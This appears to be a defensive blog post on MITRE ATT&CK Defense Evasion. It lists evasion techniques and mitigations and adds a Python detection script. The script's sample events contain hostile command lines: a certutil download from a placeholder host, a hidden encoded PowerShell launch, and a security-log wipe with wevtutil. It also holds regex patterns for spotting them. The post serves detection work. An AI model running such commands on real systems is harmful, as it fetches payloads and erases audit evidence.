
🕵️‍♂️ MITRE ATT&CK: Tactic TA0005 Defense Evasion – The Art of Staying Invisible

  • Writer: bharat kumar
  • Oct 23
  • 2 min read

Updated: Oct 24



Cyber attackers no longer just sneak into your systems; they live within them, unseen and unnoticed. The MITRE ATT&CK tactic TA0005: Defense Evasion covers how adversaries dodge security tools, pass as legitimate activity, delete their traces, and disguise what they are doing so they stay undetected.

⚙️ Common Evasion Tricks

  • 🧰 Living Off the Land (LOTL): Using built-in tools like PowerShell, certutil, or mshta instead of malware to blend in.

  • 🎭 Masquerading & DLL Side-Loading: Renaming files or loading malicious DLLs through trusted apps.

  • 💾 Fileless Attacks: Running payloads directly in memory to avoid leaving footprints on disk.

  • 🔐 Obfuscation: Encoding or encrypting scripts to bypass scanners.

  • 🧹 Log Tampering: Deleting or altering logs to erase evidence.

  • 🚫 Security Disablement: Turning off antivirus, EDR, or firewalls before executing attacks.

  • 🪪 Abuse of Trust: Using stolen digital certificates or legitimate cloud services to appear safe.

🧨 Recent Trends

  • Ransomware groups like ALPHV/BlackCat use Rust-based loaders to evade detection.

  • DLL side-loading remains a favorite in targeted attacks to run code under trusted names.

  • Fileless techniques are rising — malware now “lives” in memory, avoiding file-based scanning.

  • Government advisories report growing use of LOLBins, where everyday tools become weapons.

🛡️ How to Defend

  • 🚫 Limit admin privileges: The fewer admins, the fewer ways attackers can hide.

  • ✅ Enable allowlisting: Let only approved apps run on endpoints.

  • 🧱 Patch regularly: Many evasion tricks follow an exploit.

  • 👀 Monitor PowerShell & command-line use: Unusual patterns = red flag.

  • 🧩 Use behavioral EDR: Catch process injection and memory-only payloads.

  • 📜 Centralize logs: Store and protect them so attackers can’t delete history.

  • 🔒 Back up smart: Keep offline or immutable backups in case evasion leads to ransomware.
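As an added illustration of the "monitor PowerShell & command-line use" and "centralize logs" advice above (example code written for this post, not part of the original or any vendor product), the script below runs a few behavioral rules over process-creation events. The events are constructed samples loosely shaped like Windows 4688 / Sysmon event 1 fields, the hostnames, users and URL are made up, and the rule names are my own; the ATT&CK technique references are the standard public ones.

```python
import re
from typing import Dict, List

# Constructed sample events (hypothetical hosts, users, paths); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "ws01", "user": "alice", "parent": "winword.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat"},
    {"host": "ws02", "user": "bob", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},  # base64 of "ABC"
    {"host": "ws02", "user": "bob", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil.exe cl Security"},
    {"host": "ws03", "user": "svc", "parent": "services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Each rule: (rule name, ATT&CK reference, predicate over one event).
# They look at behaviour (parent, binary, arguments), not at file hashes.
RULES = [
    ("lolbin_download", "T1105 via certutil",
     lambda e: e["image"].lower().endswith("certutil.exe")
     and re.search(r"-urlcache|-decode", e["cmdline"], re.I)),
    ("office_spawns_lolbin", "T1218 / T1036",
     lambda e: e["parent"].lower() in {"winword.exe", "excel.exe", "outlook.exe"}
     and re.search(r"\\(certutil|mshta|rundll32|regsvr32|powershell)\.exe$", e["image"], re.I)),
    ("encoded_powershell", "T1027",
     lambda e: e["image"].lower().endswith("powershell.exe")
     and re.search(r"(^|\s)-(e|enc|encodedcommand)\b", e["cmdline"], re.I)),
    ("log_clear", "T1070.001",
     lambda e: e["image"].lower().endswith("wevtutil.exe")
     and re.search(r"\bcl\b|clear-log", e["cmdline"], re.I)),
]


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) match; an event can trip several rules."""
    alerts = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                alerts.append({"host": e["host"], "user": e["user"], "rule": name,
                               "technique": technique, "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['technique']} on {a['host']} as {a['user']}: {a['cmdline']}")
```

Because the rules key on parent process and arguments rather than file names, a renamed binary or an in-memory payload launched through one of these tools still surfaces, which is exactly where file-based scanning falls short; in practice these events should be shipped off-host first so a later `wevtutil cl` cannot erase them.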

💡 Final Thoughts

Defense evasion is the hacker’s invisibility cloak. But visibility is power; strong monitoring, behavior-based detection, and smart prevention will strip that cloak away.

“The best defense is not just protection — it’s detection.” 🛡️✨


Created by and owned by cybersergeants.org